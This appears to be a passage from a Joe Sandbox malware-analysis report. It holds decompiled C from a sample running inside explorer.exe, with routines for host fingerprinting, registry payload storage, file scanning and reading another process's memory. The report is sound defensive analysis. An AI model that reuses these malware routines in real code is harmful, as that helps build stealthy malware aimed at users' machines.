0x00774c98
0x00774c9b
0x00774cb1
0x00774cbb
0x00774cc5
0x00774ce2
0x00774ce2
0x00774ce5
0x00774cee
0x00774cfd
0x00774d07
0x00774d12
0x00774d19
0x00774d1e
0x00774d23
0x00774d3a
0x00774d40
0x00774d4f
0x00774d5b
0x00774d69
0x00774d77
0x00774d87
0x00774d92
0x00774d95
0x00774dad
0x00774da6
0x00774da9
0x00774da9
0x00774dc0
0x00774dde

APIs

GetComputerNameA.KERNEL32(?,00000101), ref: 00774BC3
RegOpenKeyExA.KERNELBASE(80000002,00772174,00000000,00020119,?), ref: 00774C01

Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC

Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D

GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00774D40

Strings

t!w, xrefs: 00774BF6

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00774B9B, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173
registry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00774B9B(intOrPtr* __eax, void* __edx, intOrPtr _a122) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				long _v24;
				long _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				signed int _v41;
				char _v298;
				char* _t80;
				intOrPtr _t84;
				void* _t86;
				intOrPtr _t89;
				void* _t91;
				intOrPtr _t94;
				void* _t96;
				intOrPtr _t100;
				CHAR* _t111;

				_a122 = _a122 + __edx;
				 *__eax =  *__eax + __eax;
				_v8 = __eax;
				_v16 = 0;
				_v12 = 0x101;
				if(GetComputerNameA( &_v298,  &_v12) != 0) {
					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
				}
				_t80 =  *0x77a25c; // 0x772174
				RegOpenKeyExA(0x80000002, _t80, 0, 0x20119,  &_v36); // executed
				_v12 = 0x101;
				_t84 =  *0x77a0e4; // 0x771d14
				_t86 = E007738B0(_v36, _t84, 0, 0,  &_v298,  &_v12); // executed
				if(_t86 == 0) {
					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t89 =  *0x77a0e8; // 0x771d20
				_t91 = E007738B0(_v36, _t89, 0, 0,  &_v298,  &_v12); // executed
				if(_t91 == 0) {
					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
				}
				_v12 = 0x101;
				_t94 =  *0x77a0ec; // 0x771d2c
				_t96 = E007738B0(_v36, _t94, 0, 0,  &_v298,  &_v12); // executed
				if(_t96 == 0) {
					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
				}
				_v12 = 4;
				_v20 = 0;
				_t100 =  *0x77a0f0; // 0x771d3c
				E007738B0(_v36, _t100, 0, 0,  &_v20,  &_v12); // executed
				E00773890(_v36);
				_v12 = 0;
				_v28 = 0;
				_v24 = 0;
				_t111 =  *0x77a268; // 0x7721d0
				GetVolumeInformationA(_t111, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0); // executed
				_v32 = _v20 ^ _v28 ^ _v24;
				E00771164(_v32,  &_v298);
				E00771308(_v8,  &_v298);
				E00771164(_v16,  &_v298);
				E0077133C(_v8,  &_v298);
				_v40 = _v8;
				_v41 = 0;
				while( *_v40 != 0) {
					_v41 = _v41 ^ E0077118C( *_v40);
					_v40 = _v40 + 2;
				}
				E00771164(_v41,  &_v298);
				return E0077133C(_v8,  &(( &_v298)[6]));
			}

0x00774b9b
0x00774b9e
0x00774ba9
0x00774bae
0x00774bb1
0x00774bcb
0x00774be8
0x00774be8
0x00774bf6
0x00774c01
0x00774c07
0x00774c1d
0x00774c27
0x00774c31
0x00774c4e
0x00774c4e
0x00774c51
0x00774c67
0x00774c71
0x00774c7b
0x00774c98
0x00774c98
0x00774c9b
0x00774cb1
0x00774cbb
0x00774cc5
0x00774ce2
0x00774ce2
0x00774ce5
0x00774cee
0x00774cfd
0x00774d07
0x00774d12
0x00774d19
0x00774d1e
0x00774d23
0x00774d3a
0x00774d40
0x00774d4f
0x00774d5b
0x00774d69
0x00774d77
0x00774d87
0x00774d92
0x00774d95
0x00774dad
0x00774da6
0x00774da9
0x00774da9
0x00774dc0
0x00774dde

APIs

GetComputerNameA.KERNEL32(?,00000101), ref: 00774BC3
RegOpenKeyExA.KERNELBASE(80000002,00772174,00000000,00020119,?), ref: 00774C01

Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC

Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D

GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00774D40

Strings

t!w, xrefs: 00774BF6

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00778BF8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
registry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00778BF8(intOrPtr* __eax, void* __edx) {
				void* _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v117;
				char _v273;
				char _v277;
				char* _t29;
				intOrPtr _t34;
				void* _t36;
				intOrPtr _t40;
				short _t55;

				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				_t29 =  *0x77a25c; // 0x772174
				RegOpenKeyExA(0x80000002, _t29, 0, 0x20119,  &_v4); // executed
				_v8 = 0;
				_v16 = 0x101;
				_t34 =  *0x77a0e4; // 0x771d14
				_t36 = E007738B0(_v4, _t34, 0, 0,  &_v273,  &_v16); // executed
				if(_t36 == 0) {
					_v12 = E00771BA8(_v12, E007712DC( &_v277),  &_v277);
				}
				_v20 = 4;
				_v16 = 0;
				_t40 =  *0x77a0f0; // 0x771d3c
				E007738B0(_v8, _t40, 0, 0,  &_v16,  &_v20); // executed
				E00773890(_v8);
				 *0x77a03c = _v12;
				 *0x77a040 = _v16;
				 *0x77a044 = _v12 ^ _v16 ^ 0xaf15f9fc;
				 *0x77a048 = _v12 ^ 0xbf2bf9fd;
				 *0x77a04c = _v12;
				 *0x77a04e = E00771884(_v12);
				_t55 = _v16;
				 *0x77a050 = _t55;
				return _t55;
			}

0x00778bf9
0x00778bfb
0x00778c10
0x00778c1b
0x00778c23
0x00778c26
0x00778c3c
0x00778c46
0x00778c50
0x00778c6d
0x00778c6d
0x00778c70
0x00778c79
0x00778c88
0x00778c92
0x00778c9d
0x00778ca5
0x00778cad
0x00778cbd
0x00778cca
0x00778cd3
0x00778ce1
0x00778ce7
0x00778ceb
0x00778cf4

APIs

RegOpenKeyExA.KERNELBASE(80000002,00772174,00000000,00020119,?), ref: 00778C1B

Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC

Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D

Strings

t!w, xrefs: 00778C10

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00778BFC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73
registry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00778BFC() {
				void* _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				char _v277;
				char* _t26;
				intOrPtr _t31;
				void* _t33;
				intOrPtr _t37;
				short _t52;

				_t26 =  *0x77a25c; // 0x772174
				RegOpenKeyExA(0x80000002, _t26, 0, 0x20119,  &_v8); // executed
				_v12 = 0;
				_v20 = 0x101;
				_t31 =  *0x77a0e4; // 0x771d14
				_t33 = E007738B0(_v8, _t31, 0, 0,  &_v277,  &_v20); // executed
				if(_t33 == 0) {
					_v12 = E00771BA8(_v12, E007712DC( &_v277),  &_v277);
				}
				_v20 = 4;
				_v16 = 0;
				_t37 =  *0x77a0f0; // 0x771d3c
				E007738B0(_v8, _t37, 0, 0,  &_v16,  &_v20); // executed
				E00773890(_v8);
				 *0x77a03c = _v12;
				 *0x77a040 = _v16;
				 *0x77a044 = _v12 ^ _v16 ^ 0xaf15f9fc;
				 *0x77a048 = _v12 ^ 0xbf2bf9fd;
				 *0x77a04c = _v12;
				 *0x77a04e = E00771884(_v12);
				_t52 = _v16;
				 *0x77a050 = _t52;
				return _t52;
			}

0x00778c10
0x00778c1b
0x00778c23
0x00778c26
0x00778c3c
0x00778c46
0x00778c50
0x00778c6d
0x00778c6d
0x00778c70
0x00778c79
0x00778c88
0x00778c92
0x00778c9d
0x00778ca5
0x00778cad
0x00778cbd
0x00778cca
0x00778cd3
0x00778ce1
0x00778ce7
0x00778ceb
0x00778cf4

APIs

RegOpenKeyExA.KERNELBASE(80000002,00772174,00000000,00020119,?), ref: 00778C1B

Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC

Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D

Strings

t!w, xrefs: 00778C10

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00777304, Relevance: 3.1, APIs: 2, Instructions: 102
registry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00777304(intOrPtr __eax) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char* _t41;
				char* _t78;
				long _t79;

				_v8 = __eax;
				_v12 = 0;
				if( *0x77a034 == 0) {
					_t41 =  *0x77a260; // 0x7721a4
					_v20 = RegOpenKeyExA(0x80000001, _t41, 0, 0xf003f,  &_v16);
				} else {
					_t78 =  *0x77a260; // 0x7721a4
					_t79 = RegOpenKeyExA(0x80000002, _t78, 0, 0xf003f,  &_v16); // executed
					_v20 = _t79;
				}
				if(_v20 == 0) {
					_v28 = 0;
					if(E007738B0(_v16, 0, 0, 0, 0,  &_v28) == 0 && _v28 > 0) {
						_v24 = E007713DC(_v28);
						_v36 = _v28;
						_v32 = E007713DC(_v36);
						E007738B0(_v16, 0, 0, 0, _v24,  &_v28);
						E007759BC(_v24, 0x77a03c, _v28,  &_v36, _v32);
						if(_v36 == 0x188) {
							E007772C4(_v32);
							_v40 = _v32;
							if( *((intOrPtr*)(_v40 + 0x11d)) == 0 &&  *((intOrPtr*)(_v40 + 0x121)) == 0) {
								E007712B8(_v8, 0x188, _v32);
								_v12 = 0xffffffff;
							}
						}
						E00771440(_v24);
						E00771440(_v32);
					}
					E00773890(_v16);
				}
				return _v12;
			}

0x0077730a
0x0077730f
0x00777319
0x00777347
0x00777358
0x0077731b
0x00777326
0x00777331
0x00777337
0x00777337
0x0077735f
0x00777367
0x00777384
0x0077739c
0x007773a2
0x007773ad
0x007773c2
0x007773dd
0x007773e9
0x007773ee
0x007773f6
0x00777404
0x00777421
0x00777426
0x00777426
0x00777404
0x00777430
0x00777438
0x00777438
0x00777440
0x00777440
0x0077744b

APIs

RegOpenKeyExA.KERNELBASE(80000002,007721A4,00000000,000F003F,?), ref: 00777331
RegOpenKeyExA.ADVAPI32(80000001,007721A4,00000000,000F003F,?), ref: 00777352

Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC

Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454

Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D

Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00778064, Relevance: 3.0, APIs: 2, Instructions: 35
registry

C-Code - Quality: 88%

			E00778064(void* __eax, char* __ecx, char* __edx) {
				void* _v8;
				char* _v12;
				char* _v16;
				signed char _v20;
				void* _v24;
				long _t20;
				signed int _t24;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				_t20 = RegOpenKeyExA(_v8, _v12, 0, 0xf003f,  &_v24); // executed
				if(_t20 == 0) {
					_t24 = RegDeleteValueA(_v24, _v16);
					asm("sbb eax, eax");
					_v20 =  ~(_t24 & 0xffffff00 | _t24 == 0x00000000);
					E00773890(_v24);
				}
				return _v20;
			}

0x0077806a
0x0077806d
0x00778070
0x00778075
0x0077808b
0x00778093
0x0077809d
0x007780aa
0x007780ac
0x007780b2
0x007780b2
0x007780bd

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 0077808B
RegDeleteValueA.ADVAPI32(?,?), ref: 0077809D

Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00778B98, Relevance: 3.0, APIs: 2, Instructions: 35

C-Code - Quality: 50%

			E00778B98(intOrPtr __eax) {
				intOrPtr _v8;
				intOrPtr _t16;
				void* _t19;

				_v8 = __eax;
				_t23 =  *0x77a034;
				if( *0x77a034 == 0) {
					 *0x77b21c(0, _v8, 0x1a, 0xffffffff);
					E0077133C(_v8, E00778BF8);
				} else {
					 *0x77b21c(0, _v8, 0x26, 0xffffffff);
					_t16 =  *0x77a090; // 0x771c10
					E0077133C(_v8, _t16);
				}
				return E00777560(_v8, _t19, _t23);
			}

0x00778b9c
0x00778b9f
0x00778ba6
0x00778bd6
0x00778be5
0x00778ba8
0x00778bb2
0x00778bb8
0x00778bc2
0x00778bc7
0x00778bf7

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00778BB2
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00778BD6

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 0077453C, Relevance: 3.0, APIs: 2, Instructions: 29

C-Code - Quality: 25%

			E0077453C(void* __eax) {
				void* _v8;
				char _v9;
				signed int _v16;
				void* _t16;

				_v8 = __eax;
				_v9 = 0;
				if(_v8 == 0 || _v8 == 0xffffffff) {
					_v8 = GetCurrentProcess();
				}
				if( *0x77b250 != 0) {
					_t16 =  *0x77b250(_v8,  &_v16); // executed
					if(_t16 != 0) {
						asm("sbb eax, eax");
						_v9 =  ~( ~_v16);
					}
				}
				return _v9;
			}

0x00774542
0x00774545
0x0077454d
0x0077455b
0x0077455b
0x00774565
0x0077456f
0x00774577
0x0077457e
0x00774582
0x00774582
0x00774577
0x0077458b

APIs

GetCurrentProcess.KERNEL32 ref: 00774555
IsWow64Process.KERNELBASE(00000000,?), ref: 0077456F

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00778B6C, Relevance: 3.0, APIs: 2, Instructions: 18
thread

C-Code - Quality: 100%

			E00778B6C() {
				long _v8;
				void* _t5;

				_t5 = CreateThread(0, 0, E00778AA4, 0, 0,  &_v8); // executed
				_v8 = _t5;
				return CloseHandle(_v8);
			}

0x00778b81
0x00778b87
0x00778b96

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00008AA4,00000000,00000000,?), ref: 00778B81
CloseHandle.KERNEL32(?), ref: 00778B8E

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007789D2, Relevance: 1.5, APIs: 1, Instructions: 37

C-Code - Quality: 100%

			E007789D2() {
				long _v8;
				char _v17;
				long _v24;
				long _v28;
				CHAR* _t16;
				intOrPtr _t21;
				intOrPtr _t23;
				void* _t24;

				_t16 =  *0x77a268; // 0x7721d0
				GetVolumeInformationA(_t16, 0, 0,  &_v8,  &_v24,  &_v28, 0, 0); // executed
				_v8 = _v8 ^ 0xc1b5f2f0;
				E00771164(_v8,  &_v17);
				_t21 =  *0x77a260; // 0x7721a4
				E0077133C(_t21,  &_v17);
				_t23 =  *0x77a260; // 0x7721a4
				_t24 = E0077133C(_t23, E00778A44);
				_v8 = _v8 ^ 0xc6b7feb7;
				_v8 = _v8 ^ 0x183cca04;
				return _t24;
			}

0x007789ee
0x007789f4
0x007789fa
0x00778a07
0x00778a10
0x00778a16
0x00778a23
0x00778a29
0x00778a31
0x00778a38
0x00778a42

APIs

GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007789F4

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007789D4, Relevance: 1.5, APIs: 1, Instructions: 36

C-Code - Quality: 100%

			E007789D4() {
				long _v8;
				char _v17;
				long _v24;
				long _v28;
				CHAR* _t16;
				intOrPtr _t21;
				intOrPtr _t23;
				void* _t24;

				_t16 =  *0x77a268; // 0x7721d0
				GetVolumeInformationA(_t16, 0, 0,  &_v8,  &_v24,  &_v28, 0, 0); // executed
				_v8 = _v8 ^ 0xc1b5f2f0;
				E00771164(_v8,  &_v17);
				_t21 =  *0x77a260; // 0x7721a4
				E0077133C(_t21,  &_v17);
				_t23 =  *0x77a260; // 0x7721a4
				_t24 = E0077133C(_t23, E00778A44);
				_v8 = _v8 ^ 0xc6b7feb7;
				_v8 = _v8 ^ 0x183cca04;
				return _t24;
			}

0x007789ee
0x007789f4
0x007789fa
0x00778a07
0x00778a10
0x00778a16
0x00778a23
0x00778a29
0x00778a31
0x00778a38
0x00778a42

APIs

GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007789F4

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00777982, Relevance: 1.5, APIs: 1, Instructions: 21

C-Code - Quality: 100%

			E00777982() {
				long _v8;
				long _v12;
				CHAR* _t5;
				int _t6;

				_t5 =  *0x77a268; // 0x7721d0
				_t6 = GetVolumeInformationA(_t5, 0, 0, 0x77b110,  &_v8,  &_v12, 0, 0); // executed
				 *0x77b110 =  *0x77b110 ^ 0xf1f1f1f1;
				return _t6;
			}

0x0077799f
0x007779a5
0x007779ab
0x007779b8

APIs

GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,0077B110,?,?,00000000,00000000), ref: 007779A5

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007738B0, Relevance: 1.5, APIs: 1, Instructions: 21
registry

C-Code - Quality: 100%

			E007738B0(void* _a4, char* _a8, int* _a12, int* _a16, char* _a20, int* _a24) {
				long _v8;
				long _t15;

				_t15 = RegQueryValueExA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				_v8 = _t15;
				return _v8;
			}

0x007738cc
0x007738d2
0x007738da

APIs

RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00777984, Relevance: 1.5, APIs: 1, Instructions: 20

C-Code - Quality: 100%

			E00777984() {
				long _v8;
				long _v12;
				CHAR* _t5;
				int _t6;

				_t5 =  *0x77a268; // 0x7721d0
				_t6 = GetVolumeInformationA(_t5, 0, 0, 0x77b110,  &_v8,  &_v12, 0, 0); // executed
				 *0x77b110 =  *0x77b110 ^ 0xf1f1f1f1;
				return _t6;
			}

0x0077799f
0x007779a5
0x007779ab
0x007779b8

APIs

GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,0077B110,?,?,00000000,00000000), ref: 007779A5

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00779080, Relevance: 1.5, APIs: 1, Instructions: 14

C-Code - Quality: 100%

			E00779080(intOrPtr _a4) {
				void* _t10;
				void* _t11;

				_a4 = _a4 + 4;
				 *0x77b114 = E0077458C(0);
				E00772574(0); // executed
				E00778D0C(_t10, _t11, 0, _a4); // executed
				ExitProcess(0);
			}

0x00779086
0x00779091
0x00779098
0x007790a1
0x007790a8

APIs

Part of subcall function 00778D0C: GetCurrentProcess.KERNEL32 ref: 00778D33
Part of subcall function 00778D0C: GetCurrentProcess.KERNEL32 ref: 00778D5D
Part of subcall function 00778D0C: GetCurrentProcess.KERNEL32 ref: 00778D77
Part of subcall function 00778D0C: LocalAlloc.KERNEL32(00000000,00000014), ref: 00778D94
Part of subcall function 00778D0C: CreateMutexA.KERNELBASE(?,00000000,00771CC8), ref: 00778DB4
Part of subcall function 00778D0C: LocalFree.KERNEL32(?), ref: 00778DC3
Part of subcall function 00778D0C: RtlInitializeCriticalSection.NTDLL(0077BE04), ref: 00778E0C
Part of subcall function 00778D0C: Sleep.KERNELBASE(000003E8), ref: 00778FC8
Part of subcall function 00778D0C: GetCursorPos.USER32(?), ref: 00779000
Part of subcall function 00778D0C: RtlExitUserThread.NTDLL(00000000), ref: 00779069

ExitProcess.KERNEL32 ref: 007790A8

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007713B4, Relevance: 1.3, APIs: 1, Instructions: 17

C-Code - Quality: 100%

			E007713B4(void** __eax, long __edx) {
				void** _v8;
				long _v12;
				void* _t7;

				_v12 = __edx;
				_v8 = __eax;
				_t7 = VirtualAlloc(0, _v12, 0x3000, 4); // executed
				 *_v8 = _t7;
				return _t7;
			}

0x007713ba
0x007713bd
0x007713cd
0x007713d6
0x007713db

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007713CD

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Non-executed Functions

Function 00775640, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137

C-Code - Quality: 91%

			E00775640(char* __eax, void* __ecx, void* __edx) {
				char* _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				struct _WIN32_FIND_DATAA _v352;
				char _v609;
				char _v866;
				intOrPtr _t68;
				int _t81;
				intOrPtr _t89;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t131;
				void* _t133;
				void* _t134;
				void* _t135;

				_v8 = __eax;
				_v12 = 0;
				 *_v8 = 0;
				 *0x77b21c(0,  &_v609, 0x1a, 0xffffffff);
				_t68 =  *0x77a188; // 0x771e60
				E0077133C( &_v609, _t68);
				_t135 = _t134 + 8;
				_v352.dwFileAttributes = 0x80;
				_v16 = FindFirstFileA( &_v609,  &_v352);
				 *((char*)(_t133 + E007712DC( &_v609) - 0x25e)) = 0;
				if(_v16 == 0xffffffff) {
					L12:
					FindClose(_v16);
					return _v12;
				} else {
					goto L1;
				}
				do {
					L1:
					if(_v352.cFileName == 0x2e) {
						goto L11;
					}
					E00771308( &_v866,  &_v609);
					E0077133C( &_v866,  &(_v352.cFileName));
					_t89 =  *0x77a178; // 0x771e20
					E0077133C( &_v866, _t89);
					_t135 = _t135 + 0x10;
					if(E00773988( &_v866) == 0) {
						goto L11;
					}
					_v24 = E007747AC( &_v866,  &_v20);
					if(_v24 <= 0) {
						goto L11;
					}
					 *((char*)(_v20 + _v24)) = 0;
					_t127 =  *0x77a17c; // 0x771e2c
					_v28 = E00771110(_v20, _t127);
					if(_v28 == 0) {
						E00771828(_v20);
						goto L11;
					}
					_v28 = _v28 + 0xd;
					if( *_v28 == 0x31) {
						_t128 =  *0x77a180; // 0x771e3c
						_v28 = E00771110(_v20, _t128);
						if(_v28 != 0) {
							_v28 = _v28 + 0xe;
							_v32 = E00771110(_v28, E0077584C);
							 *_v32 = 0;
							E00771308(_v8, _v28);
							 *_v32 = 0x22;
							_t131 =  *0x77a184; // 0x771e4c
							_v28 = E00771110(_v20, _t131);
							if(_v28 != 0) {
								_v28 = _v28 + 0x12;
								_v32 = E00771110(_v28, 0x775850);
								 *_v32 = 0;
								E0077133C(_v8, 0x775854);
								E0077133C(_v8, _v28);
								_v12 = 0xffffffff;
							}
						}
					}
					E00771828(_v20);
					goto L12;
					L11:
					_t81 = FindNextFileA(_v16,  &_v352);
					asm("sbb eax, eax");
				} while ( ~( ~_t81) != 0);
				goto L12;
			}

0x00775649
0x0077564e
0x00775654
0x00775664
0x0077566a
0x00775677
0x0077567c
0x0077567f
0x0077569d
0x007756ab
0x007756b7
0x00775839
0x0077583d
0x00775849
0x00000000
0x00000000
0x00000000
0x007756bd
0x007756bd
0x007756c4
0x00000000
0x00000000
0x007756d6
0x007756e9
0x007756f1
0x007756fe
0x00775703
0x00775713
0x00000000
0x00000000
0x00775727
0x0077572e
0x00000000
0x00000000
0x0077573a
0x0077573e
0x0077574c
0x00775753
0x00775815
0x00000000
0x00775815
0x00775759
0x00775763
0x00775769
0x00775777
0x0077577e
0x00775784
0x00775795
0x0077579b
0x007757a4
0x007757ac
0x007757af
0x007757bd
0x007757c4
0x007757c6
0x007757d7
0x007757dd
0x007757e9
0x007757f9
0x00775801
0x00775801
0x007757c4
0x0077577e
0x0077580b
0x00000000
0x0077581a
0x00775825
0x0077582d
0x00775831
0x00000000

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00775664
FindFirstFileA.KERNEL32(?,00000080), ref: 00775697

Part of subcall function 00773988: FindFirstFileA.KERNEL32(?,?), ref: 007739A4
Part of subcall function 00773988: FindClose.KERNEL32(000000FF), ref: 007739BF

Part of subcall function 007747AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007747D9
Part of subcall function 007747AC: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007747FB
Part of subcall function 007747AC: GetFileSize.KERNEL32(?,00000000), ref: 00774810
Part of subcall function 007747AC: ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0077483F
Part of subcall function 007747AC: CloseHandle.KERNEL32(?), ref: 00774849

Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A

FindNextFileA.KERNEL32(000000FF,00000080), ref: 00775825
FindClose.KERNEL32(000000FF), ref: 0077583D

Strings

., xrefs: 007756BD

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00774DE0, Relevance: 6.1, APIs: 4, Instructions: 69
native

C-Code - Quality: 100%

			E00774DE0(void* __eax, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				long _v16;
				void _v20;
				long _v24;
				void _v28;
				intOrPtr _v48;
				void _v52;

				_v8 = __eax;
				_v12 = 0;
				E00771258( &_v52, 0x18);
				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18, 0);
				if(_v16 == 0 && _v48 != 0) {
					_v20 = _v48 + 8;
					ReadProcessMemory(_v8, _v20,  &_v28, 4,  &_v24);
					_v20 = _v28 + 0x3c;
					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
					_v20 = _v20 + _v28 + 0x28;
					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
					_v12 = _v20 + _v28;
				}
				return _v12;
			}

0x00774de6
0x00774deb
0x00774df6
0x00774e0f
0x00774e16
0x00774e24
0x00774e39
0x00774e45
0x00774e5a
0x00774e69
0x00774e7e
0x00774e8a
0x00774e8a
0x00774e93

APIs

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00774E09
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E39
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E5A
